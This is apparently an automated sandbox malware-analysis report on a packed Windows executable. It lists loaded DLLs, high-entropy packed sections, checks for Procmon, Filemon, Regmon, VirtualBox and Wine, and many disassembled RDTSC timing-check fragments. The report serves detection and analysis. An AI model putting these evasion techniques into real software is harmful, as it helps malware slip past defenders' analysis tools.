                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: 0gnHF2twcT.exeStatic file information: File size 1881600 > 1048576
                Source: 0gnHF2twcT.exeStatic PE information: Raw size of mimqpfga is bigger than: 0x100000 < 0x1a3200

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeUnpacked PE file: 0.2.0gnHF2twcT.exe.70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mimqpfga:EW;grnkiruz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mimqpfga:EW;grnkiruz:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: 0gnHF2twcT.exeStatic PE information: real checksum: 0x1cffc8 should be: 0x1ce053
                Source: 0gnHF2twcT.exeStatic PE information: section name:
                Source: 0gnHF2twcT.exeStatic PE information: section name: .idata
                Source: 0gnHF2twcT.exeStatic PE information: section name:
                Source: 0gnHF2twcT.exeStatic PE information: section name: mimqpfga
                Source: 0gnHF2twcT.exeStatic PE information: section name: grnkiruz
                Source: 0gnHF2twcT.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A39AAF push FFFFFFDBh; iretd 0_3_00A39AC0
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A39AAF push FFFFFFDBh; iretd 0_3_00A39AC0
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A39F2D push esi; retf 0_3_00A39F30
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A39F2D push esi; retf 0_3_00A39F30
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A321CA push ecx; ret 0_3_00A324EA
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A321CA push ecx; ret 0_3_00A324EA
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A39AAF push FFFFFFDBh; iretd 0_3_00A39AC0
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A39AAF push FFFFFFDBh; iretd 0_3_00A39AC0
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A39F2D push esi; retf 0_3_00A39F30
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A39F2D push esi; retf 0_3_00A39F30
                Source: 0gnHF2twcT.exeStatic PE information: section name: entropy: 7.980219456440776
                Source: 0gnHF2twcT.exeStatic PE information: section name: mimqpfga entropy: 7.95348924063239

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: C83E0 second address: C83E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: C83E4 second address: C83EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: C83EA second address: C8400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602E2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: C8400 second address: C8404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: C8404 second address: C7C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F05491602E4h 0x0000000e push dword ptr [ebp+122D0009h] 0x00000014 cld 0x00000015 call dword ptr [ebp+122D2BB0h] 0x0000001b pushad 0x0000001c cmc 0x0000001d jmp 00007F05491602E8h 0x00000022 xor eax, eax 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D3072h], edi 0x0000002b jnc 00007F05491602DCh 0x00000031 popad 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 jp 00007F05491602EFh 0x0000003c mov dword ptr [ebp+122D39EFh], eax 0x00000042 pushad 0x00000043 mov edi, eax 0x00000045 mov dword ptr [ebp+122D3072h], ebx 0x0000004b popad 0x0000004c mov esi, 0000003Ch 0x00000051 mov dword ptr [ebp+122D2E43h], eax 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b jg 00007F05491602DCh 0x00000061 mov dword ptr [ebp+122D2BD8h], esi 0x00000067 lodsw 0x00000069 mov dword ptr [ebp+122D3072h], ebx 0x0000006f sub dword ptr [ebp+122D2E4Ah], ebx 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 cld 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e jmp 00007F05491602E7h 0x00000083 nop 0x00000084 push edx 0x00000085 jmp 00007F05491602DBh 0x0000008a pop edx 0x0000008b push eax 0x0000008c pushad 0x0000008d push eax 0x0000008e push edx 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: C7C06 second address: C7C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 247511 second address: 247526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F05491602DEh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 24766E second address: 247672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 247672 second address: 24767B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 24767B second address: 247682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 247682 second address: 247688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 247688 second address: 24769C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0549119936h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2477FA second address: 24780A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 24794C second address: 247963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 247963 second address: 247969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 247ACD second address: 247AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 247AD1 second address: 247ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 247ADD second address: 247AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 247AE3 second address: 247AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 249F02 second address: 249F08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 249F08 second address: 249F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 249F0C second address: 249F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 249F10 second address: 249F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov cx, 89D0h 0x0000000f push 00000000h 0x00000011 stc 0x00000012 push E9CBCAA5h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F05491602E9h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 249F42 second address: 249F47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 249F47 second address: 249FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F05491602D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 163435DBh 0x00000014 mov cl, EAh 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D2AC2h], ebx 0x0000001e push 00000000h 0x00000020 jmp 00007F05491602E6h 0x00000025 push 00000003h 0x00000027 or dword ptr [ebp+122D298Bh], ecx 0x0000002d push 87DEDFDCh 0x00000032 push eax 0x00000033 push edx 0x00000034 jng 00007F05491602EDh 0x0000003a jmp 00007F05491602E7h 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 249FA9 second address: 24A011 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0549119942h 0x00000008 jmp 00007F054911993Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor dword ptr [esp], 47DEDFDCh 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F0549119938h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 lea ebx, dword ptr [ebp+12455D28h] 0x00000036 jmp 00007F0549119942h 0x0000003b sub esi, dword ptr [ebp+122D2EE0h] 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jo 00007F054911993Ch 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 24A011 second address: 24A015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 24A015 second address: 24A01A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 24A06E second address: 24A0A7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F05491602D6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 and ecx, dword ptr [ebp+122D2B43h] 0x0000001a add dword ptr [ebp+122D2CE2h], ebx 0x00000020 push 00000000h 0x00000022 sub esi, dword ptr [ebp+122D29A1h] 0x00000028 push 390B6A6Fh 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 jns 00007F05491602D6h 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 24A0A7 second address: 24A122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119942h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 390B6AEFh 0x00000010 mov cx, 7DCAh 0x00000014 push 00000003h 0x00000016 mov di, A54Dh 0x0000001a push 00000000h 0x0000001c cmc 0x0000001d push 00000003h 0x0000001f call 00007F0549119939h 0x00000024 jmp 00007F0549119947h 0x00000029 push eax 0x0000002a pushad 0x0000002b jmp 00007F0549119948h 0x00000030 push edi 0x00000031 push esi 0x00000032 pop esi 0x00000033 pop edi 0x00000034 popad 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F054911993Ah 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 24A122 second address: 24A127 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 24A127 second address: 24A14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F0549119945h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 24A1F5 second address: 24A1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 24A1FF second address: 24A235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F054911993Ah 0x0000000c nop 0x0000000d and dh, FFFFFFE1h 0x00000010 push 00000000h 0x00000012 push 8D5E998Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0549119948h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 24A235 second address: 24A23B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 25C9A5 second address: 25C9AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 25C9AA second address: 25C9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F05491602E1h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 26A402 second address: 26A426 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0549119941h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 26A426 second address: 26A440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E0h 0x00000007 jbe 00007F05491602DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 26816F second address: 268186 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F054911993Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 268186 second address: 26818C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 26818C second address: 268190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 268190 second address: 2681B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F05491602E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2681B2 second address: 2681C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F054911993Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2681C3 second address: 2681E9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jo 00007F05491602D6h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 268487 second address: 26848F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 26848F second address: 268495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2685C4 second address: 2685C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 268710 second address: 268716 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 268716 second address: 268735 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0549119948h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 268D0B second address: 268D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 268D0F second address: 268D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0549119940h 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 268E86 second address: 268EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F05491602E8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 268EA5 second address: 268EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 268EA9 second address: 268EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 26900A second address: 269014 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 269014 second address: 269018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 269018 second address: 269033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F0549119942h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 269033 second address: 26904E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jng 00007F05491602DCh 0x0000000d ja 00007F05491602DCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
